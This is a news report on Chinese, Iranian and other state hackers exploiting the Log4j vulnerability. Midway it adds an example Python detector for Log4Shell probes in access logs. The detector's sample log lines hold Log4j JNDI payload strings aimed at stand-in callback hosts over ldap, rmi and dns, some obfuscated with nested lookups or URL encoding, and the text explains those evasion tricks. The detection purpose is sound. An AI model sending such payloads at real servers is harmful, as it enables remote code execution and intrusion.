Cybersecurity professionals say hackers working for China, Iran and other nations are exploiting a vulnerability (tracked as CVE-2021-44228) in the open-source logging library Apache Log4j to gain a foothold in networks they intend to breach later.
The problem has panicked the private sector and federal government alike because the affected software is widely used. Industries involving power, water, food, transportation, and manufacturing were exposed, according to industrial control cybersecurity firm Dragos.
Whether or not America’s adversaries had any hand in the flaw’s discovery, they are exploiting it now, the cyber pros say. The cybersecurity firm Mandiant said it has seen China and Iran using the vulnerability; Microsoft said it saw the same, along with groups from North Korea and Turkey.
Mandiant vice president of intelligence analysis John Hultquist said Wednesday that his team expects other state-sponsored hackers to join China and Iran.
“We believe these actors will work quickly to create footholds in desirable networks for follow-on activity which may last for some time,” said Mr. Hultquist in a statement. “In some cases, they will work from a wish list of targets that existed long before this vulnerability was public knowledge. In other cases, desirable targets may be selected after broad targeting.”
Mr. Hultquist said the Iranians observed by Mandiant are “particularly aggressive” and have taken part in ransomware operations geared more toward causing disruption than toward financial gain. Microsoft likewise said on its website that the Iranian group had deployed ransomware and that the company had observed the group acquiring and modifying exploit code for the vulnerability.
Check Point, a cybersecurity firm headquartered in Israel and California, said Wednesday it had observed the Iranian hacking group using the Log4j vulnerability against seven targets in Israel over the previous 24 hours.
The Chinese hackers are a familiar foe for Microsoft. Microsoft identified them as Hafnium, the group it previously blamed for the attacks on on-premises Microsoft Exchange servers earlier in 2021.
Federal authorities later said the Exchange hack, which compromised tens of thousands of computers, was attributable to criminal contract hackers working for China’s Ministry of State Security.
Microsoft said Hafnium appears to have expanded its targeting through its use of the Log4j flaw.
“HAFNIUM, a threat actor group operating out of China, has been observed utilizing the vulnerability to attack virtualization infrastructure to extend their typical targeting,” said Microsoft on its website. “In these attacks, HAFNIUM-associated systems were observed using a [Domain Name System] service typically associated with testing activity to fingerprint systems.”
The problems associated with the Log4j vulnerability have grown even as cybersecurity professionals work to defend against attacks. In a post updated Wednesday afternoon, Check Point said it had observed more than 1.8 million attempts to exploit the Log4j vulnerability since Friday, and that almost half of the corporate networks it tracks had already seen an attempt.
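The DNS-based fingerprinting attributed to Hafnium above and the exploitation attempts Check Point counts rest on the same mechanism: the attacker plants a Log4j lookup string of the form ${jndi:<scheme>://<host>/...} in any request field the target is likely to log, and a vulnerable server then resolves (and, for ldap or rmi, fetches from) the attacker's host. Scanners routinely wrap the string in nested lookups such as ${lower:j} or ${::-j}, or URL-encode it, to slip past naive pattern matches. The script below is an added example, not code from the article or from any vendor named in it: it undoes those obfuscations the way Log4j 2.x resolves nested lookups, then reports the scheme and callback host of each hit. The access-log lines, addresses and hostnames are constructed for the example.

```python
"""Spot Log4Shell (CVE-2021-44228) probe strings in web access logs.

Added example, not from the original article. Undoes common lookup
obfuscations, then reports the scheme and callback host of each probe.
"""
import re
from urllib.parse import unquote

# Constructed sample access-log lines for the example (not real traffic).
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [13/Dec/2021:10:01:22 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [13/Dec/2021:10:01:25 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://callback.example.net/a}"',
    '203.0.113.9 - - [13/Dec/2021:10:01:31 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://scan.example.net:1389/x} HTTP/1.1" 404 12 "-" "curl/7.79"',
    '203.0.113.11 - - [13/Dec/2021:10:02:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-d}ns://fp.example.net/probe}"',
    '203.0.113.12 - - [13/Dec/2021:10:02:10 +0000] "GET /login?u=%24%7Bjndi%3Armi%3A%2F%2Fevil.example.net%2Fobj%7D HTTP/1.1" 200 10 "-" "python-requests/2.26"',
]

# An innermost lookup: ${...} whose body contains no further $, { or }.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# After normalization: ${jndi:<scheme>:[//]<host>[:port]/...}
_JNDI = re.compile(r"\$\{jndi:\s*([a-z]+):/{0,2}([^/:}\s]+)", re.IGNORECASE)


def _resolve_one(match: re.Match) -> str:
    """Resolve one innermost lookup as Log4j 2.x would, or leave it untouched."""
    body = match.group(1)
    key, sep, rest = body.partition(":")
    if sep and key.lower() == "lower":     # ${lower:J} -> j
        return rest.lower()
    if sep and key.lower() == "upper":     # ${upper:j} -> J
        return rest.upper()
    if ":-" in body:                       # ${name:-default}: undefined lookup -> default text
        return body.split(":-", 1)[1]
    return match.group(0)                  # e.g. ${jndi:...}: keep it for the outer regex


def normalize(text: str) -> str:
    """URL-decode and collapse nested lookups until the text stops changing."""
    prev = None
    while prev != text:
        prev = text
        text = unquote(text)
        text = _INNERMOST.sub(_resolve_one, text)
    return text


def find_probes(line: str):
    """Return (scheme, host) for every JNDI lookup in one log line."""
    canon = normalize(line)
    return [(m.group(1).lower(), m.group(2)) for m in _JNDI.finditer(canon)]


def scan(lines):
    """Return [(line_no, scheme, host, kind)] for every hit across the log.

    A dns:// lookup can only trigger a DNS query (fingerprinting / canary);
    ldap:// and rmi:// can make a vulnerable server fetch a remote reference.
    """
    hits = []
    for n, line in enumerate(lines, 1):
        for scheme, host in find_probes(line):
            kind = "dns-callback (fingerprint)" if scheme == "dns" else "remote-reference fetch"
            hits.append((n, scheme, host, kind))
    return hits


if __name__ == "__main__":
    for n, scheme, host, kind in scan(SAMPLE_LOG_LINES):
        print(f"line {n}: {scheme}://{host}  [{kind}]")
```

Feed it real access or application logs and the hosts it reports are what to block at the egress resolver and to hunt for in outbound DNS and LDAP traffic; a hit with a dns:// scheme means someone was only checking whether the server is vulnerable, while an ldap:// or rmi:// hit from a host you did not expect deserves the same response as any other remote code execution attempt.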
The Cybersecurity and Infrastructure Security Agency has said that, so far, no federal agencies are known to have been compromised.
• This article includes wire service reports.